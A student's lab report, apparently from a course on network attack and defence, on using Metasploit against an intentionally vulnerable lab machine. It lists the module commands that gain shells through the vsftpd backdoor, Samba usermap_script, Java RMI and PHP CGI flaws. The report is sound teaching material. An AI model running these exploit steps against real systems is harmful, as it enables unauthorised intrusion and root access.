20222317 2024-2025-1 《网络与系统攻防技术》实验六实验报告

一、实验内容

1.1内容回顾总结

本周主要学习练习了Metasploit工具的使用,让我深入的了解了Metasploit的功能和使用流程。Metasploit 是一个功能强大的渗透测试框架,广泛应用于网络安全领域。它为安全专家、渗透测试人员和红队提供了一个全面的工具集,支持漏洞利用、攻击模拟和安全评估。Metasploit 提供了丰富的攻击模块,涵盖了远程代码执行、服务拒绝、提权等多种攻击方式,支持对多种操作系统和应用程序进行测试。

1.2实验内容

(1)前期渗透

靶机IP:192.168.10.145

主机发现

端口扫描

扫描目标HTTP服务器的HTTP版本信息

(2) Vsftpd源码包后门漏洞(21端口)

(3) SambaMS-RPC Shell命令注入漏洞(端口139)

(4)Java RMI SERVER命令执行漏洞(1099端口)

(5) PHP CGI参数执行注入漏洞(80端口)

二、实验过程

1、前期渗透

①主机发现(可用Aux中的arp_sweep,search一下就可以use)

查询靶机IP地址,输入命令:ifconfig得到结果为192.168.10.145

msfconsole进入控制台

search arp_sweep进行搜索

use 0后查看所需参数

options

设置靶机IP set rhosts 192.168.10.145之后运行run

扫描到了靶机

②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等

利用Aux中的portscan/tcp,依次输入
search portscan/tcp
use 0
show options

设置靶机IPset rhosts 192.168.10.145
run

③扫描目标HTTP服务器的HTTP版本信息

use auxiliary/scanner/http/http_version
use 0
show missing

set rhosts 192.168.10.145
run

发现目标主机运行的是一个较旧的 Samba 版本(3.0.20),且使用 SMBv1

2、Vsftpd源码包后门漏洞(21端口)

漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

use exploit/unix/ftp/vsftpd_234_backdoor 
use 0
set rhosts 192.168.10.145
run

run攻击成功执行后,再输入uname –a、 pwd、 id、ifconfig等命令 验证。

3、SambaMS-RPC Shell命令注入漏洞(端口139)

漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。

use exploit/multi/samba/usermap_script
use 0
set rhosts 192.168.10.145
run

利用成功 执行uname–a、ifconfig验证

4、Java RMI SERVER命令执行漏洞(1099端口)

漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
根据前期扫描结果,可以发现靶机1099端口是开放的

use exploit/multi/misc/java_rmi_server
use 0
options

set rhosts 192.168.10.145
run

运行成功,输入sessions -i 3进入任务
shell
输入whoami验证下,得到结果root

5、PHP CGI参数执行注入漏洞(80端口)

漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
根据前期扫描结果可知,可以发现靶机80端口是开放的

use exploit/multi/http/php_cgi_arg_injection
use 0
set rhosts 192.168.10.145
run

攻击成功,输入dir验证

三、问题及解决方案

本次实验过程较为顺利,未出现问题

四、学习感悟、思考

通过周四课上的实践任务,已经对Metasploit工具的使用有了一定的熟练度,明白在使用Metasploit进行渗透攻击时,主要就是search-use-show-set-run/exploit
这几步。通过search搜索对应的漏洞,use指定设置的模块,show显示可使用的模块或选项,set设定选项或模块, run&exploit启用模块。
总体来说,这次实验过程以及原理很好理解,只要配置好靶机以及确定漏洞模块是否与靶机相匹配决定了最终运行是否能够成功,从攻击的角度来说Metasploit工具一定程度上提供了便利,从计算机使用者的角度来说,在日常学习生活中一定要警惕陌生的文件、网站链接、配置好主机的安全策略,定时查杀病毒木马,提高网络与系统安全防范意识。

参考资料
Metasploitable 2 Exploitability Guide

posted @ 2024-11-17 12:32  贺梓峰  阅读(26)  评论(0编辑  收藏  举报